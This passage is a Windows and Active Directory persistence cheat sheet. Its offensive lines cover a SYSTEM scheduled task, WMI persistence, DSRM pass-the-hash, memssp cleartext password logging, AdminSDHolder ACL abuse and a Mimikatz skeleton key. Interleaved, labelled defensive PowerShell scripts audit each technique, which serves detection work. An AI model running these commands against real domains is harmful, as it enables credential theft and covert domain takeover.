Persistence
schtasks /create /tn "xct" /ru "SYSTEM" /tr "c:\temp\xct.exe" /sc DAILY
schtasks /run /tn "xct"
schtasks /query /tn "xct" /FO list /v
schtasks /delete /tn "xct" /f
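The task created by the schtasks one-liner above has two tell-tale properties: it runs as SYSTEM and its action points into a writable, non-standard directory. The following audit script is an added example for defenders, not part of the original page; it flags every scheduled task that combines a highly privileged principal with an executable under one of the directories in $SuspiciousRoots (that list, and the principal list, are assumptions to tune per environment).

```powershell
# Added defensive example (not from the original page): enumerate scheduled tasks that
# run as SYSTEM or another privileged principal and execute something from a writable,
# non-standard path such as c:\temp. Both lists below are assumptions; extend them.
$SuspiciousRoots = @('C:\Temp\', 'C:\Users\', 'C:\ProgramData\', 'C:\Windows\Temp\')
$PrivilegedUsers = @('SYSTEM', 'S-1-5-18', 'NT AUTHORITY\SYSTEM', 'LOCALSERVICE', 'NETWORKSERVICE', 'Administrators')

function Find-SuspiciousScheduledTask {
    [CmdletBinding()]
    param()
    # Run elevated: non-admins only see their own tasks.
    Get-ScheduledTask | ForEach-Object {
        $task  = $_
        $runAs = $task.Principal.UserId
        foreach ($action in $task.Actions) {
            # Only exec actions carry an Execute path; COM handler actions have none.
            $exe = $action.Execute
            if (-not $exe) { continue }
            $exe = [Environment]::ExpandEnvironmentVariables($exe).Trim('"')
            $fromSuspiciousPath = $SuspiciousRoots | Where-Object { $exe -like "$_*" }
            $isPrivileged       = $PrivilegedUsers -contains $runAs
            if ($fromSuspiciousPath -and $isPrivileged) {
                [PSCustomObject]@{
                    TaskName  = $task.TaskName
                    TaskPath  = $task.TaskPath
                    RunAs     = $runAs
                    Execute   = $exe
                    Arguments = $action.Arguments
                    State     = $task.State
                    Author    = $task.Author
                    Created   = $task.Date
                }
            }
        }
    }
}

Find-SuspiciousScheduledTask | Format-Table -AutoSize
```

For near-real-time coverage rather than periodic sweeps, enable "Audit Other Object Access Events" so task creation is logged as Security event 4698, which carries the full task XML including the action path and the principal.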
Run "PersistWMI"; this registers the payload to execute alongside another program, e.g. when the victim opens Chrome, our persistence calls back.
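Persistence that fires when another program starts is implemented as a permanent WMI event subscription. The script below is an added example for defenders, not part of the original page or of the PersistWMI tool: it joins the three objects such a subscription needs in root\subscription (filter, consumer, binding) and shows the WQL trigger and the command or script each binding executes. The Get-RefName helper is an assumption that copes with the binding references coming back either as CIM objects or as path strings.

```powershell
# Added defensive example (not from the original page): list permanent WMI event
# subscriptions. A subscription consists of an __EventFilter (WQL trigger), an
# __EventConsumer (what runs) and a __FilterToConsumerBinding joining them.
# Some builds ship a legitimate "SCM Event Log" pair, so review rather than auto-delete.
function Get-RefName {
    # Binding properties are object references; depending on how they were retrieved
    # they arrive as a CimInstance or as a path string like __EventFilter.Name="xyz".
    param($Ref)
    if ($Ref -is [string]) { return ($Ref -replace '.*Name="([^"]+)".*', '$1') }
    return $Ref.Name
}

function Get-WmiSubscription {
    $ns = 'root\subscription'
    $filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter)
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer)
    $bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding)

    foreach ($binding in $bindings) {
        $filterName   = Get-RefName $binding.Filter
        $consumerName = Get-RefName $binding.Consumer
        $filter   = $filters   | Where-Object Name -eq $filterName   | Select-Object -First 1
        $consumer = $consumers | Where-Object Name -eq $consumerName | Select-Object -First 1

        # What actually executes depends on the consumer class.
        $consumerType = $consumer.CimClass.CimClassName
        $payload = switch ($consumerType) {
            'CommandLineEventConsumer'  { $consumer.CommandLineTemplate }
            'ActiveScriptEventConsumer' { $consumer.ScriptText }
            default                     { '(no command/script payload)' }
        }

        [PSCustomObject]@{
            Filter              = $filterName
            Query               = $filter.Query
            ConsumerType        = $consumerType
            Consumer            = $consumerName
            Payload             = $payload
            # A process-creation query is the "run when the victim opens X" pattern.
            ProcessStartTrigger = [bool]($filter.Query -match 'Win32_ProcessStartTrace|Win32_Process')
        }
    }
}

Get-WmiSubscription | Format-List
```

Sysmon logs the creation of these objects as events 19 (filter), 20 (consumer) and 21 (binding), which is the cheapest way to catch a new subscription at the moment it is written rather than on the next sweep.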
The Directory Services Restore Mode (DSRM) password is only needed when promoting a DC; it is rarely used or changed, so we either obtain it or change it:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <dc>
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <dc>
# Compare the hashes; the first one is the DSRM hash
# We can PtH into the DC with the NTLM hash of the DSRM account, but first we have to change its logon behaviour
Enter-PSSession -Computername <dc>
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
# PtH into it
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<domain> /user:Administrator /ntlm:<hash> /run:powershell.exe"'
Security Support Provider, with mimikatz's mimilib.dll, which logs all passwords in cleartext:
Invoke-Mimikatz -Command '"misc::memssp"'
AdminSDHolder persistence (PowerView): grants the user full rights on AdminSDHolder, forces SDProp to push that ACL onto the protected groups, then adds the user to Domain Admins:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName <username> -Rights All -Verbose
$session = New-PSSession -ComputerName <dc>
Invoke-Command -FilePath .\Invoke-SDPropagator -Session $session
Enter-PSSession -Session $session
Add-DomainGroupMember -Identity 'Domain Admins' -Members <user> -Verbose
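Because SDProp copies the AdminSDHolder ACL onto every protected group and account (by default roughly once an hour), the ACE added above survives the user being removed from Domain Admins. The script below is an added example for defenders, not part of the original page or of PowerView: it reports write-class ACEs on AdminSDHolder held by anyone outside a trusted set, and separately lists accounts still carrying adminCount=1 after leaving a protected group (SDProp never clears that flag, and such accounts keep the AdminSDHolder ACL and no longer inherit from their OU). The trusted-principal set and the protected-group list are assumptions to adjust for your forest; the ActiveDirectory RSAT module is required.

```powershell
# Added defensive example (not from the original page): audit AdminSDHolder and adminCount.
Import-Module ActiveDirectory

function Get-AdminSDHolderAnomaly {
    $domain  = Get-ADDomain
    $nb      = $domain.NetBIOSName
    # Principals expected to hold write-class rights here (assumption; adjust per forest).
    $trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                 "$nb\Domain Admins", "$nb\Enterprise Admins")
    $acl = Get-Acl -Path "AD:\CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($trusted -contains $ace.IdentityReference.Value) { continue }
        $rights = $ace.ActiveDirectoryRights.ToString()
        # Rights that let the holder rewrite the object or its security descriptor;
        # WriteProperty only counts when it is unscoped (all-zero ObjectType = all attributes).
        $dangerous = ($rights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner') -or
                     ($rights -match 'WriteProperty' -and $ace.ObjectType -eq [Guid]::Empty)
        if ($dangerous) {
            [PSCustomObject]@{
                Principal  = $ace.IdentityReference.Value
                Rights     = $rights
                ObjectType = $ace.ObjectType
                Inherited  = $ace.IsInherited
            }
        }
    }
}

function Get-OrphanedAdminCount {
    # Common default set of SDProp-protected groups (assumption for your domain).
    $protected = 'Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Administrators',
                 'Account Operators', 'Server Operators', 'Print Operators', 'Backup Operators'
    $members = foreach ($g in $protected) {
        Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue |
            Select-Object -ExpandProperty DistinguishedName
    }
    # adminCount=1 on an account that is no longer in any protected group is stale,
    # and a classic place for a quietly persisted ACL to live.
    Get-ADUser -LDAPFilter '(adminCount=1)' |
        Where-Object { $members -notcontains $_.DistinguishedName } |
        Select-Object SamAccountName, DistinguishedName
}

Get-AdminSDHolderAnomaly | Format-Table -AutoSize
Get-OrphanedAdminCount   | Format-Table -AutoSize
```

Run it from a baseline first: any ACE it reports that you cannot explain from your own delegation model is the finding, and a change to the AdminSDHolder object is also visible as Security event 5136 (directory object modified) on the DC when directory service change auditing is on.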
# This lets you log into every account with the password "mimikatz"; you should probably compile it yourself and change that. You might also need to remove process protection before running it
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <name>
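The DSRM, SSP and skeleton-key techniques above all leave their mark on, or are gated by, a handful of LSA settings on the domain controllers: the DsrmAdminLogonBehavior value that the DSRM section sets to 2, the "Security Packages" list that a registered mimilib.dll lands in, and RunAsPPL, which is the "process protection" the skeleton-key note says may need removing. The script below is an added example for defenders, not part of the original page: it reads those values on every DC over WinRM and reports deviations from an assumed baseline (value absent or 0, only built-in SSPs, RunAsPPL = 1). The known-SSP list and the memssp log file name are assumptions; memssp patches LSASS in memory rather than registering a package, so only its log file is visible from the registry-reading side.

```powershell
# Added defensive example (not from the original page): audit LSA settings on all DCs.
# Baseline assumptions: DsrmAdminLogonBehavior absent or 0 (DSRM account unusable while
# AD DS runs; 1 = usable when AD DS is stopped, 2 = always usable), RunAsPPL = 1
# (LSASS runs protected), and only built-in SSPs in "Security Packages".
Import-Module ActiveDirectory

function Get-DcLsaPosture {
    param(
        [string[]]$ComputerName = (Get-ADDomainController -Filter * | Select-Object -ExpandProperty HostName)
    )
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        $lsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
        $lsa     = Get-ItemProperty -Path $lsaPath
        $osc     = Get-ItemProperty -Path "$lsaPath\OSConfig" -ErrorAction SilentlyContinue

        # Built-in package names (assumption; add any third-party SSP you deploy).
        $knownSsp = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap', 'negoexts')
        # "Security Packages" is REG_MULTI_SZ and may contain an empty-quote placeholder entry.
        $packages   = @($lsa.'Security Packages') + @($osc.'Security Packages') |
            Where-Object { $_ -and $_ -ne '""' }
        $unknownSsp = $packages | Where-Object { $knownSsp -notcontains $_.ToLower() }

        # memssp writes captured credentials to a log in System32 (assumed default name).
        $memsspLog = Join-Path $env:SystemRoot 'System32\mimilsa.log'

        $dsrm = if ($null -eq $lsa.DsrmAdminLogonBehavior) { 0 } else { [int]$lsa.DsrmAdminLogonBehavior }
        $ppl  = if ($null -eq $lsa.RunAsPPL) { 0 } else { [int]$lsa.RunAsPPL }

        [PSCustomObject]@{
            Computer          = $env:COMPUTERNAME
            DsrmLogonBehavior = $dsrm
            RunAsPPL          = $ppl
            UnknownSsp        = ($unknownSsp -join ', ')
            MemsspLogPresent  = Test-Path $memsspLog
        }
    } | Select-Object Computer, DsrmLogonBehavior, RunAsPPL, UnknownSsp, MemsspLogPresent
}

# Anything off the baseline is worth a ticket.
Get-DcLsaPosture | Where-Object {
    $_.DsrmLogonBehavior -ne 0 -or $_.RunAsPPL -ne 1 -or $_.UnknownSsp -or $_.MemsspLogPresent
} | Format-Table -AutoSize
```

Registry state only catches the persistent variants; the in-memory ones (memssp, skeleton key) are better caught at the moment they happen, as a non-LSA process opening LSASS with write access (Sysmon event 10) and, for the skeleton key, a subsequent flurry of RC4-only Kerberos tickets on a domain that otherwise uses AES.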